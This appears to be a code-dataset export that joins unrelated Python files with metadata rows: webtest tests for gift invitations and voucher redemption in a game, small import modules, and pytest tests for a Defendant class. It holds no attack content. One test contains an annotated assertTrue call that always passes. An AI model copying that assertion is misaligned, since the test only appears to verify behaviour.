        response = self.login_user(INVITE_EMAIL, 'pw')
        response = response.follow()  # Redirect from / to /capacity
        self.assertEqual(urls.auth_signup_complete(), response.request.path)
        self.assertTrue("No Available Rovers" in response)
        # Now login as the recipient and go through the validation process.
        recipient = self.get_logged_in_user()
        response = self.app.get(recipient.url_validate())
        self.assertTrue("Account Authenticated" in response)
        response = self.app.get(urls.ops())
        self.assertEqual(urls.ops(), response.request.path)
        self.assert_logged_in(response)
        # Verify the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        vouchers = gamestate['user']['vouchers']
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
        # Verify that the product that delivers this voucher is no longer available for the recipient.
        self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
        self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
        # Verify the senders invite was accepted.
        sender = self.get_user_by_email(sender.email)
        self.assertEqual(len(sender.invitations), 1)
        invite_model = sender.invitations.values()[0]
        self.assertIsNotNone(invite_model.accepted_at)

    # Test buying a gift which sends an invitation and is redeemed by an existing user.
    def test_buy_gift_with_invitation_existing_user(self):
        """Purchase a gift, follow the emailed invite, and redeem as an existing user."""
        # NOTE: More extensive testing of the purchasing system is provided in test_buy_gift_with_invitation_new_user.
        response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_last_name=INVITE_LAST_NAME)
        # An invitation should have been sent with a gift attached.
        gamestate = self.get_gamestate()
        invitations = gamestate['user']['invitations']
        self.assertEqual(len(invitations), 1)
        # Verify that the truncation code in the validation step worked.
        self.assertEqual(invitations.values()[0]['recipient_last_name'], INVITE_LAST_NAME_TRUNCATED)
        invite = invitations.values()[0]
        # The gift is not put into the gamestate so check the model object itself.
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.invitations), 1)
        invite_model = sender.invitations.values()[0]
        self.assertIsNone(invite_model.accepted_at)
        gift = invite_model.gift
        # Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
        email = self._get_invite_accept_email()
        invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
        # Verify some of the expected data was inserted into the email body.
        self.assertEqual(INVITE_EMAIL, email.email_to)
        self.assertTrue(INVITE_FIRST_NAME in email.body_html)
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Logout the sender as we are going to signup a new user to be the redeemer.
        self.logout_user()
        EXISTING_EMAIL = 'testexisting@example.com'
        # Create and login as a new user which will be the 'existing' user.
        self.create_user(EXISTING_EMAIL, 'pw')
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Follow the accept invite URL as the logged in user which should STILL show a choice of whether
        # to redeem the gift for a new or existing user.
        response = self.app.get(invite_accept_url)
        # The inviters first name should be shown in the template to explain to the user who invited them.
        self.assertTrue(sender.first_name in response)
        # Select the redeem for existing user option.
        response = response.click(href=gift.url_gift_redeem_existing_user())
        # And login as the existing user.
        form = response.forms['form_login']
        form['login_email'] = EXISTING_EMAIL
        form['login_password'] = "pw"
        response = form.submit()
        # The new user should redirect back to / and since they are authorized should redirect to ops.
        response = response.follow()  # Follow redirect to /
        response = response.follow()  # Follow redirect to /ops
        self.assertEqual(urls.ops(), response.request.path)
        self.assert_logged_in(response)
        # Verify the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        # NOTE(review): assertTrue with two args here — first arg is always truthy,
        # so this does not actually compare; presumably assertEqual was intended.
        self.assertTrue(gamestate['user']['email'], EXISTING_EMAIL)
        vouchers = gamestate['user']['vouchers']
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
        # Verify that the product that delivers this voucher is no longer available for the recipient.
        self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
        self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
        # Verify the senders invite was accepted.
        sender = self.get_user_by_email(sender.email)
        self.assertEqual(len(sender.invitations), 1)
        invite_model = sender.invitations.values()[0]
        self.assertIsNotNone(invite_model.accepted_at)

    # Test redeeming multiple gifts, especially to check the user.current_voucher_level changes.
    def test_redeem_multiple_gifts(self):
        """Redeem an S1 gift then an ALL gift, checking current_voucher_level chips."""
        # Check the initial gamestate.
        gamestate = self.get_gamestate()
        self.assertEqual(len(gamestate['user']['vouchers']), 0)
        self.assertIsNone(gamestate['user']['current_voucher_level'])
        self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="testuser@example.com")
        gift_s1 = self.get_logged_in_user().gifts_created.values()[0]
        self.purchase_gift(PRODUCT_KEY_ALL_GIFT, recipient_email="testuser@example.com")
        gift_all = [g for g in self.get_logged_in_user().gifts_created.values() if g.gift_id != gift_s1.gift_id][0]
        # Redeem the S1 gift.
        response = self.app.get(gift_s1.url_gift_redeem())
        response = response.click(href=gift_s1.url_gift_redeem_existing_user())
        form = response.forms['form_login']
        form['login_email'].value = "testuser@example.com"
        form['login_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # A voucher should have been delivered.
        gamestate = self.get_gamestate()
        self.assertEqual(len(gamestate['user']['vouchers']), 1)
        self.assertTrue(VOUCHER_KEY_S1 in gamestate['user']['vouchers'])
        # And the current_voucher_level should have changed.
        self.assertEqual(gamestate['user']['current_voucher_level'], VOUCHER_KEY_S1)
        found_chips = self.chips_for_path(['user'])
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.MOD)
        self.assertEqual(found_chips[0]['value']['current_voucher_level'], VOUCHER_KEY_S1)
        # Clear chips
        self.advance_now(minutes=10)
        # Redeem the ALL gift.
        response = self.app.get(gift_all.url_gift_redeem())
        response = response.click(href=gift_all.url_gift_redeem_existing_user())
        form = response.forms['form_login']
        form['login_email'].value = "testuser@example.com"
        form['login_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # Another voucher should have been delivered.
        gamestate = self.get_gamestate()
        self.assertEqual(len(gamestate['user']['vouchers']), 2)
        self.assertTrue(VOUCHER_KEY_ALL in gamestate['user']['vouchers'])
        # And the current_voucher_level should have changed.
        self.assertEqual(gamestate['user']['current_voucher_level'], VOUCHER_KEY_ALL)
        found_chips = self.chips_for_path(['user'])
        self.assertEqual(len(found_chips), 1)
        self.assertEqual(found_chips[0]['action'], chips.MOD)
        self.assertEqual(found_chips[0]['value']['current_voucher_level'], VOUCHER_KEY_ALL)

    # Test purchasing multiple gifts, which are repurchased product objects.
    def test_buy_multiple_gifts(self):
        """Buying the same gift product twice creates two purchases and two gifts."""
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.shop.purchased_products), 0)
        self.assertEqual(len(sender.gifts_created), 0)
        self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="testrecipient1@example.com")
        self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="testrecipient2@example.com")
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.shop.purchased_products), 2)
        self.assertEqual(len(sender.gifts_created), 2)

    # Test buying a gift and redeeming it as the creator.
    def test_buy_gift_with_invitation_to_self(self):
        """The gift creator can redeem their own gift via the signup-form login path."""
        response = self.purchase_gift(PRODUCT_KEY_S1_GIFT)
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.invitations), 1)
        invite_model = sender.invitations.values()[0]
        self.assertIsNone(invite_model.accepted_at)
        sender_id = sender.user_id
        self.assertEqual(len(sender.gifts_created), 1)
        gift = sender.gifts_created.values()[0]
        # Grab the post purchase gamestate.
        gamestate = self.get_gamestate()
        invitations = gamestate['user']['invitations']
        self.assertEqual(len(invitations), 1)
        invite = invitations.values()[0]
        # Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
        email = self._get_invite_accept_email()
        invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Logout the sender to be sure logging in as them works.
        self.logout_user()
        # Follow the accept invite URL as a not logged in user.
        response = self.app.get(invite_accept_url)
        # Select the redeem for a new user option, however we will sign in as the existing.
        response = response.click(href=gift.url_gift_redeem_new_user())
        form = response.forms['form_signup']
        # These fields should have been filled out.
        self.assertEqual(form['signup_email'].value, INVITE_EMAIL)
        self.assertEqual(form['first_name'].value, INVITE_FIRST_NAME)
        # Fill out the signup form with the senders valid, existing user credentials.
        form['signup_email'] = "testuser@example.com"
        form['signup_password'] = "pw"
        response = form.submit()
        response = response.follow()
        user_id = self.assert_logged_in(response)
        # Verify got logged in as the sender.
        self.assertEqual(user_id, sender_id)
        # Verify the sender who became the recipient got the voucher for the gift.
        vouchers = self.get_gamestate()['user']['vouchers']
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
        # Verify the senders invite was accepted.
        sender = self.get_user_by_email(sender.email)
        self.assertEqual(len(sender.invitations), 1)
        invite_model = sender.invitations.values()[0]
        self.assertIsNotNone(invite_model.accepted_at)

    # Test that a user created via an invitation (so has a user.inviter_id) who then receives another
    # invitation with a gift who then redeems that gift+invite for their existing account doesn't have their
    # inviter_id replaced and that the second invite is still mark as accepted. (in earlier versions of the schema
    # before invites could have gift attachments there was a unique constraint on invitations.recipient_id that
    # prevented this behavior from working.)
    def test_redeem_invite_gift_from_invited_user(self):
        """A previously-invited user can redeem a second invite+gift without losing inviter_id."""
        # Create two admin invites (with gifts) as the 'testuser@example.com' admin user.
        with db.commit_or_rollback(self.get_ctx()) as ctx:
            with db.conn(ctx) as ctx:
                admin_user = self.get_logged_in_user(ctx=ctx)
                admin_user_id = admin_user.user_id
                self.make_user_admin(admin_user)
                invite_params = {
                    'recipient_email': INVITE_EMAIL, 'recipient_first_name': INVITE_FIRST_NAME,
                    'recipient_last_name': INVITE_LAST_NAME_TRUNCATED, 'recipient_message': "Hello and welcome"
                }
                invite1 = admin.send_admin_invite_with_gift_type(ctx, admin_user, invite_params,
                    gift_types.GFT_S1_PASS, "Testing Admin Invite+Gift")
                gift1 = invite1.gift
                invite2 = admin.send_admin_invite_with_gift_type(ctx, admin_user, invite_params,
                    gift_types.GFT_ALL_PASS, "Testing Admin Invite+Gift")
                gift2 = invite2.gift
        self.logout_user()
        # Sign up a new user with the first invite.
        response = self.app.get(invite1.url_invite_accept())
        # Select the redeem for a new user option.
        response = response.click(href=gift1.url_gift_redeem_new_user())
        # Accept the invite as the new user.
        form = response.forms['form_signup']
        form['signup_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # Now login as the recipient and go through the validation process.
        self.logout_user()
        self.login_user(INVITE_EMAIL, 'pw')
        self.app.get(self.get_logged_in_user().url_validate())
        # Verify the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        self.assertTrue(VOUCHER_KEY_S1_GIFT in gamestate['user']['vouchers'])
        # Now accept the second invite and gift, but login to the existing account when redeeming.
        response = self.app.get(invite2.url_invite_accept())
        # Select the redeem for a existing user option.
        response = response.click(href=gift2.url_gift_redeem_existing_user())
        # Accept the invite as the existing user.
        form = response.forms['form_login']
        form['login_email'] = INVITE_EMAIL
        form['login_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # Verify the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        self.assertTrue(VOUCHER_KEY_ALL_GIFT in gamestate['user']['vouchers'])
        recipient = self.get_logged_in_user()
        # Verify both the admin inviter invites were accepted.
        with db.commit_or_rollback(self.get_ctx()) as ctx:
            with db.conn(ctx) as ctx:
                admin_inviter = admin.get_admin_inviter_user(ctx)
                # The inviter_id for the new user should point back at the admin inviter user (Turing) who
                # was the inviter.
                self.assertEqual(recipient.inviter_id, admin_inviter.user_id)
                self.assertEqual(len(admin_inviter.invitations), 2)
                invite_model = admin_inviter.invitations.values()[0]
                self.assertIsNotNone(invite_model.accepted_at)
                self.assertEqual(invite_model.recipient_id, recipient.user_id)
                # But the gift creator_id should be the real human admin user who created the gifts/invites.
                self.assertEqual(invite_model.gift.creator_id, admin_user_id)
                self.assertEqual(invite_model.gift.redeemer_id, recipient.user_id)
                invite_model = admin_inviter.invitations.values()[1]
                self.assertIsNotNone(invite_model.accepted_at)
                self.assertEqual(invite_model.recipient_id, recipient.user_id)
                self.assertEqual(invite_model.gift.creator_id, admin_user_id)
                self.assertEqual(invite_model.gift.redeemer_id, recipient.user_id)

    # Test that redeeming a gift when the user already has that voucher is an error.
    def test_cannot_redeem_gift_if_have_voucher(self):
        """Redemption is rejected when the redeemer already owns the gift's voucher."""
        charge = ChargeAlwaysSuccess(FAKE_CHARGE_ID_1)
        self.shop_stripe_purchase_products(product_keys=[PRODUCT_KEY_S1], save_card=False, charge=charge)
        self.purchase_gift(PRODUCT_KEY_S1_GIFT)
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.gifts_created), 1)
        gift = sender.gifts_created.values()[0]
        # Grab the post purchase gamestate.
        gamestate = self.get_gamestate()
        invitations = gamestate['user']['invitations']
        self.assertEqual(len(invitations), 1)
        invite = invitations.values()[0]
        vouchers = gamestate['user']['vouchers']
        self.assertEqual(len(vouchers), 1)
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
        # Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
        email = self._get_invite_accept_email()
        invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Logout the sender as we are going to accept the invite with their credentials.
        self.logout_user()
        # Follow the accept invite URL as a not logged in user.
        response = self.app.get(invite_accept_url)
        # Select the redeem for a existing user option.
        response = response.click(href=gift.url_gift_redeem_existing_user())
        form = response.forms['form_login']
        form['login_email'] = "testuser@example.com"
        form['login_password'] = "pw"
        response = form.submit()
        # Attempting to redeem this gift should be an error shown on the page to the user since they already
        # have the voucher this gift was going to deliver.
        self.assertTrue('You cannot redeem this gift.' in response)
        self.login_user("testuser@example.com", "pw")
        # Verify nothing changed.
        gamestate = self.get_gamestate()
        invitations = gamestate['user']['invitations']
        self.assertEqual(len(invitations), 1)
        invite = invitations.values()[0]
        vouchers = gamestate['user']['vouchers']
        self.assertEqual(len(vouchers), 1)
        self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)

    # Test that redeeming the s1 gift when the user already has the all voucher is denied.
    def test_cannot_redeem_s1_gift_if_have_all_voucher(self):
        """Redemption of an S1 gift is rejected when the user holds the superseding ALL voucher."""
        charge = ChargeAlwaysSuccess(FAKE_CHARGE_ID_1)
        self.shop_stripe_purchase_products(product_keys=[PRODUCT_KEY_ALL], save_card=False, charge=charge)
        self.purchase_gift(PRODUCT_KEY_S1_GIFT)
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.gifts_created), 1)
        gift = sender.gifts_created.values()[0]
        # Grab the post purchase gamestate.
        invitations = self.get_gamestate()['user']['invitations']
        self.assertEqual(len(invitations), 1)
        invite = invitations.values()[0]
        # Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
        email = self._get_invite_accept_email()
        invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Logout the sender as we are going to accept the invite with their credentials.
        self.logout_user()
        response = self.app.get(invite_accept_url)
        # Select the redeem for a existing user option.
        response = response.click(href=gift.url_gift_redeem_existing_user())
        form = response.forms['form_login']
        # Fill out the signup form with the senders valid, existing user credentials.
        form['login_email'] = "testuser@example.com"
        form['login_password'] = "pw"
        response = form.submit()
        # Attempting to redeem this gift should be an error shown on the page to the user since they already
        # have the ALL voucher which supersedes the voucher this gift was going to deliver.
        self.assertTrue('You cannot redeem this gift.' in response)
        self.login_user("testuser@example.com", "pw")
        # Verify nothing changed.
        gamestate = self.get_gamestate()
        invitations = gamestate['user']['invitations']
        self.assertEqual(len(invitations), 1)
        invite = invitations.values()[0]
        vouchers = gamestate['user']['vouchers']
        self.assertEqual(len(vouchers), 1)
        self.assertTrue(VOUCHER_KEY_ALL in vouchers)
        self.assertTrue(VOUCHER_KEY_S1_GIFT not in vouchers)

    # Test that receiving the ALL gift makes the S1 pass product unavailable.
    def test_buy_gift_all_removes_s1_pass(self):
        """Redeeming an ALL gift removes both S1 and ALL products from the shop."""
        response = self.purchase_gift(PRODUCT_KEY_ALL_GIFT)
        sender = self.get_logged_in_user()
        self.assertEqual(len(sender.gifts_created), 1)
        gift = sender.gifts_created.values()[0]
        # Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
        invitations = self.get_gamestate()['user']['invitations']
        self.assertEqual(len(invitations), 1)
        invite = invitations.values()[0]
        email = self._get_invite_accept_email()
        invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
        # Advance past the invite creation chips etc. are empty.
        self.advance_game(minutes=10)
        # Logout the sender as we are creating a new user.
        self.logout_user()
        # Follow the accept invite URL as a not logged in user.
        response = self.app.get(invite_accept_url)
        # Select the redeem for a new user option.
        response = response.click(href=gift.url_gift_redeem_new_user())
        # Accept the invite as the new user.
        form = response.forms['form_signup']
        form['signup_password'] = "pw"
        response = form.submit()
        response = response.follow()
        # Now login as the recipient and go through the validation process.
        self.logout_user()
        self.login_user(INVITE_EMAIL, 'pw')
        self.app.get(self.get_logged_in_user().url_validate())
        # Verify the sender who became the recipient got the voucher for the gift.
        gamestate = self.get_gamestate()
        self.assertTrue(VOUCHER_KEY_ALL_GIFT in gamestate['user']['vouchers'])
        # And verify the S1 product is not available (and also the ALL product is gone too).
        self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
        self.assertTrue(PRODUCT_KEY_ALL not in gamestate['user']['shop']['available_products'])

    # Test that purchasing a gift invitation does not decrement invites_left.
    def test_buy_gift_no_change_in_invites_left(self):
        """Gift invitations do not consume the sender's invites_left count."""
        self.set_user_invites_left(1)
        self.assertEqual(self.get_logged_in_user().invites_left, 1)
        self.purchase_gift(PRODUCT_KEY_S1_GIFT)
        self.assertEqual(self.get_logged_in_user().invites_left, 1)

    # Test trying to purchase a gift invitation with a bad email address.
    def test_buy_gift_bad_email(self):
        """A malformed recipient email is rejected with a 400 and a descriptive error."""
        response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="invalid&domain", status=400)
        self.assertTrue("Invalid email address" in response['errors'][0])

    # Test trying to purchase a gift invitation with missing values.
    def test_buy_gift_missing_data(self):
        """A missing recipient_email is rejected with a 400 and a descriptive error."""
        # recipient_email is missing.
        response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email=None, status=400)
        self.assertTrue("Missing required field: recipient_email" in response['errors'][0])

    def _get_invite_accept_email(self):
        """Return the single sent email whose subject contains "Invitation".

        Asserts exactly one such email exists in the sent-email capture.
        """
        invite_emails = [e for e in self.get_sent_emails() if "Invitation" in e.subject]
        self.assertTrue(len(invite_emails) == 1)
        return invite_emails[0]
| 52.364029
| 120
| 0.683978
| 4,799
| 36,393
| 4.987289
| 0.078766
| 0.061419
| 0.034595
| 0.013788
| 0.817498
| 0.789504
| 0.759004
| 0.730509
| 0.710872
| 0.697042
| 0
| 0.007269
| 0.221279
| 36,393
| 694
| 121
| 52.439481
| 0.837262
| 0.239414
| 0
| 0.706897
| 0
| 0
| 0.093445
| 0.006573
| 0
| 0
| 0
| 0
| 0.342672
| 1
| 0.034483
| false
| 0.036638
| 0.021552
| 0
| 0.060345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb96e0546666e71ed158a5520e5f9eff31a050f4
| 151
|
py
|
Python
|
hknweb/events/forms/__init__.py
|
jyxzhang/hknweb
|
a01ffd8587859bf63c46213be6a0c8b87164a5c2
|
[
"MIT"
] | null | null | null |
hknweb/events/forms/__init__.py
|
jyxzhang/hknweb
|
a01ffd8587859bf63c46213be6a0c8b87164a5c2
|
[
"MIT"
] | null | null | null |
hknweb/events/forms/__init__.py
|
jyxzhang/hknweb
|
a01ffd8587859bf63c46213be6a0c8b87164a5c2
|
[
"MIT"
] | null | null | null |
from hknweb.events.forms.event import EventForm, EventUpdateForm
from hknweb.events.forms.attendance import AttendanceFormForm, AttendanceResponseForm
| 50.333333
| 85
| 0.880795
| 16
| 151
| 8.3125
| 0.6875
| 0.150376
| 0.240602
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066225
| 151
| 2
| 86
| 75.5
| 0.943262
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6949b98c4ca077d235b10ad7b57a0de58d6e5811
| 211
|
py
|
Python
|
bblogger/__init__.py
|
lohmega/jamble
|
ca7d2788c584cfb1c86ae766d06f6a9d57a60974
|
[
"Apache-2.0"
] | null | null | null |
bblogger/__init__.py
|
lohmega/jamble
|
ca7d2788c584cfb1c86ae766d06f6a9d57a60974
|
[
"Apache-2.0"
] | 3
|
2020-05-27T13:00:45.000Z
|
2020-09-29T12:42:23.000Z
|
bblogger/__init__.py
|
lohmega/jamble
|
ca7d2788c584cfb1c86ae766d06f6a9d57a60974
|
[
"Apache-2.0"
] | null | null | null |
from bblogger.ble import scan, BlueBerryClient
from bblogger.deserialize import BlueBerryDeserializer
from bblogger.defs import SENSORS, PASSCODE_STATUS, enum2str
from bblogger.__version__ import __version__
| 26.375
| 60
| 0.862559
| 24
| 211
| 7.208333
| 0.583333
| 0.277457
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005291
| 0.104265
| 211
| 7
| 61
| 30.142857
| 0.910053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
696cae170c6faf2c21341a0a1ca3ef2d7f2af3f4
| 8,837
|
py
|
Python
|
test/test_defendant.py
|
khelsabeck/felony_records_nc
|
f0dfa065329727df0ce2976d812bcf4c37d0bb1b
|
[
"MIT"
] | null | null | null |
test/test_defendant.py
|
khelsabeck/felony_records_nc
|
f0dfa065329727df0ce2976d812bcf4c37d0bb1b
|
[
"MIT"
] | null | null | null |
test/test_defendant.py
|
khelsabeck/felony_records_nc
|
f0dfa065329727df0ce2976d812bcf4c37d0bb1b
|
[
"MIT"
] | null | null | null |
from src.defendant import Defendant
import pytest
from datetime import date, datetime, timedelta
import typing
@pytest.fixture
def d1():
    """Fixture: a stock Defendant named John Smith, born 2010-01-01."""
    return Defendant("John", "Smith", date(2010, 1, 1))
def test_initialization():
    """Constructing a Defendant with valid data populates every field."""
    d = Defendant("John", "Smith", date(2010, 1, 1))
    # The backing attribute and the public property must agree for each field.
    assert d._first == "John" and d.first == "John"
    assert d._last == "Smith" and d.last == "Smith"
    assert d._birthdate == date(2010, 1, 1) and d.birthdate == date(2010, 1, 1)
def test_set_first_over25():
    """First names are truncated to their first 25 characters."""
    d = Defendant("aaaaaaaaaaaaaaaaaaaaaaaabc", "Smith", date(2010, 1, 1))
    expected = "aaaaaaaaaaaaaaaaaaaaaaaab"  # first 25 chars; trailing 'c' dropped
    assert d._first == expected
    assert d.first == expected
def test_set_first_noncontiguous():
    """A first name containing whitespace is rejected with ValueError."""
    with pytest.raises(Exception) as excinfo:
        Defendant("a a", "Smith", date(2010, 1, 1))
    assert type(excinfo.value) is ValueError
    assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
def test_set_first_tooshort():
    """A zero-length first name is rejected with ValueError."""
    with pytest.raises(Exception) as excinfo:
        Defendant("", "Smith", date(2010, 1, 1))
    assert type(excinfo.value) is ValueError
    assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
def test_set_first_non_string():
    """A non-string first-name input is rejected with ValueError."""
    with pytest.raises(Exception) as excinfo:
        Defendant(42, "Smith", date(2010, 1, 1))
    assert type(excinfo.value) is ValueError
    assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
def test_property_first_setter():
    """The `first` property setter replaces the stored first name."""
    d = Defendant("John", "Smith", date(2010, 1, 1))
    assert d._first == "John" and d.first == "John"
    d.first = "Mike"
    assert d._first == "Mike" and d.first == "Mike"
def test_set_last_over25():
    """Last names are truncated to their first 25 characters."""
    d = Defendant("John", "aaaaaaaaaaaaaaaaaaaaaaaabc", date(2010, 1, 1))
    expected = "aaaaaaaaaaaaaaaaaaaaaaaab"  # first 25 chars; trailing 'c' dropped
    assert d._last == expected
    assert d.last == expected
def test_set_last_noncontiguous():
    """A last name containing whitespace is rejected with ValueError."""
    with pytest.raises(Exception) as excinfo:
        Defendant("John", "a a", date(2010, 1, 1))
    assert type(excinfo.value) is ValueError
    assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
def test_set_last_tooshort():
    """A zero-length last name is rejected with ValueError."""
    with pytest.raises(Exception) as excinfo:
        Defendant("John", "", date(2010, 1, 1))
    assert type(excinfo.value) is ValueError
    assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
def test_set_last_non_string():
    """A non-string input for last will not set and raises ValueError.

    NOTE: this function was originally (mis)named test_set_first_non_string,
    duplicating the definition earlier in the file; the redefinition shadowed
    the first-name test so it was never collected by pytest. Renamed so both
    tests run; the body (which exercises the *last* name) is unchanged.
    """
    with pytest.raises(Exception) as exc_info:
        my_defendant = Defendant("John", 42, date(2010,1, 1))
    exception_raised = exc_info.value
    assert type(ValueError()) == type(exception_raised)
    assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(exc_info.__dict__)
def test_set_birthdate():
    """Non-date birthdate inputs raise ValueError and leave state untouched."""
    msg = "The birthdate must be a datetime date object."
    # Rejected at construction time.
    with pytest.raises(Exception) as excinfo:
        Defendant("John", "Smith", "bad input")
    assert type(excinfo.value) is ValueError
    assert msg in str(excinfo.__dict__)
    # Rejected via the property setter; stored date must be unchanged.
    d = Defendant("John", "Smith", date(2010, 1, 1))
    with pytest.raises(Exception) as excinfo:
        d.birthdate = "bad_data"
    assert type(excinfo.value) is ValueError
    assert msg in str(excinfo.__dict__)
    assert d._birthdate == date(2010, 1, 1)
    assert d.birthdate == date(2010, 1, 1)
    # Rejected via the explicit set_birthdate() method, likewise unchanged.
    with pytest.raises(Exception) as excinfo:
        d.set_birthdate("bad_data")
    assert type(excinfo.value) is ValueError
    assert msg in str(excinfo.__dict__)
    assert d._birthdate == date(2010, 1, 1)
    assert d.birthdate == date(2010, 1, 1)
def test_property_birthdate_setter():
    """The birthdate property setter accepts and stores a new valid date."""
    d = Defendant("John", "Smith", date(2010, 1, 1))
    assert d._birthdate == date(2010, 1, 1) and d.birthdate == date(2010, 1, 1)
    d.birthdate = date(2010, 1, 2)
    assert d._birthdate == date(2010, 1, 2) and d.birthdate == date(2010, 1, 2)
def test_property_fullname():
    """fullname joins the first and last names with a single space."""
    d = Defendant("John", "Smith", date(2010, 1, 1))
    assert d.fullname == "John Smith"
def test_validate_contiguous_str():
    """The helper validate_contiguous_str rejects each kind of invalid input."""
    d = Defendant("John", "Smith", date(2010, 1, 1))
    # '': too short; 42: wrong type; 'a a': whitespace between chars.
    for bad in ('', 42, 'a a'):
        with pytest.raises(Exception) as excinfo:
            d.validate_contiguous_str(bad)
        assert type(excinfo.value) is ValueError
        assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
def test_last_setter():
    """The `last` setter stores a contiguous string and rejects bad input."""
    d = Defendant("John", "Smith", date(2010, 1, 1))
    d.last = "Helsabeck"
    assert d.last == "Helsabeck"
    assert d._last == "Helsabeck"
    # '': too short; 42: wrong type; 'a a': whitespace between chars.
    for bad in ('', 42, 'a a'):
        with pytest.raises(Exception) as excinfo:
            d.last = bad
        assert type(excinfo.value) is ValueError
        assert "The value failed to validate. It should be a string of non-zero length with no whitespace." in str(excinfo.__dict__)
| 52.289941
| 129
| 0.72253
| 1,273
| 8,837
| 4.817753
| 0.080911
| 0.093266
| 0.039622
| 0.039133
| 0.886842
| 0.846894
| 0.812164
| 0.791293
| 0.762596
| 0.748899
| 0
| 0.024856
| 0.175965
| 8,837
| 169
| 130
| 52.289941
| 0.817358
| 0.143827
| 0
| 0.595588
| 0
| 0
| 0.213226
| 0.020307
| 0
| 0
| 0
| 0
| 0.404412
| 1
| 0.117647
| false
| 0
| 0.029412
| 0
| 0.154412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15db3ddd354bc29ad39ca0a51369700305870329
| 86
|
py
|
Python
|
blob/hashers.py
|
artgromov/blob_storage
|
8d3946eb624041da8f8512a5e9afc47c59a80b27
|
[
"MIT"
] | null | null | null |
